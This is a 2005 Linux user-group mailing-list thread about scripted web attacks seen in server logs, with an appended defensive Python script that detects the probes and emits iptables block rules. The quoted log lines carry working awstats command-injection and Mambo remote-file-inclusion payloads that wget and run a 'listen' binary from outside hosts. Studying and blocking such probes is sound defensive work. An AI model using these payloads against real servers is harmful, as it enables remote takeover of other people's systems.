[plug] Scripted hacking attempts

William Kenworthy billk at iinet.net.au
Wed Dec 21 19:21:02 WST 2005


They've been around for a few weeks.  I drop them using a string match
on port 80 (iptables), and once they've triggered it, all packets to/from
that source are dropped - no point in letting them try something else
that I might have missed!  I think most came from China from memory -
geoip helps there, as well as blocking the messenger spam.

BillK


On Wed, 2005-12-21 at 17:02 +0800, Kai wrote:
> Hi guys and girls,
> 
> FYI, I don't know if anyone else is seeing a rash of these but I've had 
> a few in the last coupla days.
> 
> 12.175.196.99 - - [21/Dec/2005:10:55:02 +0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 340
> 12.175.196.99 - - [21/Dec/2005:10:55:06 +0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 340
> 12.175.196.99 - - [21/Dec/2005:10:55:13 +0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 331
> 12.175.196.99 - - [21/Dec/2005:10:55:08 +0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 348
> 12.175.196.99 - - [21/Dec/2005:10:55:10 +0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 332
> 12.175.196.99 - - [21/Dec/2005:10:55:14 +0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 338
> 12.175.196.99 - - [21/Dec/2005:10:55:17 +0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 336
> 12.175.196.99 - - [21/Dec/2005:10:55:23 +0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 342
> 
> Cheers
> Kai
> 
-- 
William Kenworthy <billk at iinet.net.au>
Home!
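Added example (editor's code, not from either poster): a small log scanner that picks the two probe types quoted above out of an Apache access log, percent-decodes the injected shell string, pulls out the host the attacker tries to wget the dropper from, and emits iptables rules in the spirit of BillK's approach (a string match on port 80 that, once hit, drops everything to/from that source via the `recent` module). The sample log lines are constructed, modelled on the quoted ones; the rule names, the `web_attackers` list name and the 24-hour ban are this example's own choices.

```python
"""Detect awstats configdir / Mambo mosConfig_absolute_path probes in an access log
and derive a block list plus iptables rules. Editor's example; sample log is constructed."""
import re
from urllib.parse import unquote

# Constructed sample log (Apache common log format). The first two lines are modelled
# on the requests quoted in the thread; the last two are benign traffic for contrast.
SAMPLE_LOG = """\
12.175.196.99 - - [21/Dec/2005:10:55:02 +0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 340
12.175.196.99 - - [21/Dec/2005:10:55:14 +0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 338
10.0.0.5 - - [21/Dec/2005:11:00:00 +0800] "GET /awstats/awstats.pl?config=example.com HTTP/1.1" 200 5120
10.0.0.6 - - [21/Dec/2005:11:00:01 +0800] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 8812
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Perl's two-argument open() treats a leading "|" as "pipe to this command", so on a
# vulnerable awstats configdir=|...| runs the embedded shell string on the server.
AWSTATS_RE = re.compile(r'configdir=\|(.*?)\|')
# A URL in mosConfig_absolute_path makes vulnerable Mambo include() attacker-hosted PHP
# (cmd.gif here), which then runs whatever arrived in the cmd parameter.
MAMBO_RFI_RE = re.compile(r'mosConfig_absolute_path=(?:https?|ftp)://')
CMD_PARAM_RE = re.compile(r'(?:^|&)cmd=([^&]*)')
WGET_RE = re.compile(r'wget\s+([^\s;|&]+)')


def parse_line(line):
    """Split one access-log line into fields; the query string is percent-decoded once."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, query = rec["url"].partition("?")
    rec["query"] = unquote(query)  # %2e -> . , %3b -> ; , %20 -> space (not + -> space)
    return rec


def classify(rec):
    """Return (rule_name, injected_command) for a known probe, else None."""
    if rec["path"].endswith("awstats.pl"):
        m = AWSTATS_RE.search(rec["query"])
        if m:
            return ("awstats-configdir-pipe", m.group(1))
    if MAMBO_RFI_RE.search(rec["query"]):
        m = CMD_PARAM_RE.search(rec["query"])
        return ("mambo-absolute-path-rfi", m.group(1) if m else "")
    return None


def dropper_url(cmd):
    """First thing the injected shell string fetches with wget, if any."""
    m = WGET_RE.search(cmd)
    return m.group(1) if m else None


def scan(log_text):
    """Run every line through the classifier; return one dict per matching request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        found = classify(rec)
        if found:
            rule, cmd = found
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "rule": rule,
                         "cmd": cmd, "dropper": dropper_url(cmd)})
    return hits


def block_list(hits):
    """Distinct source addresses that sent at least one probe."""
    return sorted({h["ip"] for h in hits})


def iptables_rules(list_name="web_attackers", ttl=86400):
    """Rules in the spirit of the post: match the probe bytes on port 80, and once a
    source has triggered, drop all traffic to/from it for `ttl` seconds. The -m recent
    list stands in for a hand-maintained blacklist (list name and TTL are assumptions)."""
    sigs = ["awstats.pl?configdir=|", "mosConfig_absolute_path=http"]
    rules = [
        "iptables -N WEB_ATTACK",
        f"iptables -A WEB_ATTACK -m recent --name {list_name} --set -j DROP",
        f"iptables -I INPUT 1 -m recent --name {list_name} --rcheck --seconds {ttl} -j DROP",
        f"iptables -I OUTPUT 1 -m recent --name {list_name} --rdest --rcheck --seconds {ttl} -j DROP",
    ]
    rules += [f'iptables -A INPUT -p tcp --dport 80 -m string --algo bm --string "{s}" -j WEB_ATTACK'
              for s in sigs]
    return rules


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]} {h["rule"]} fetches {h["dropper"]}: {h["cmd"]}')
    print("block:", block_list(hits))
    print("\n".join(iptables_rules()))
```

Two caveats a practitioner would want: the iptables string match looks inside single packets with no TCP reassembly, so a request split across segments or with the signature bytes percent-encoded (`%61wstats`) slips past it, and the log scan above only sees the request after the web server has already handled it; and the `recent` module keeps a bounded list (the xt_recent `ip_list_tot` module parameter, 100 entries by default), so a busy host needs it raised. Dropping all traffic from a source that tripped the match also means everyone behind a shared NAT address gets banned with the attacker.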


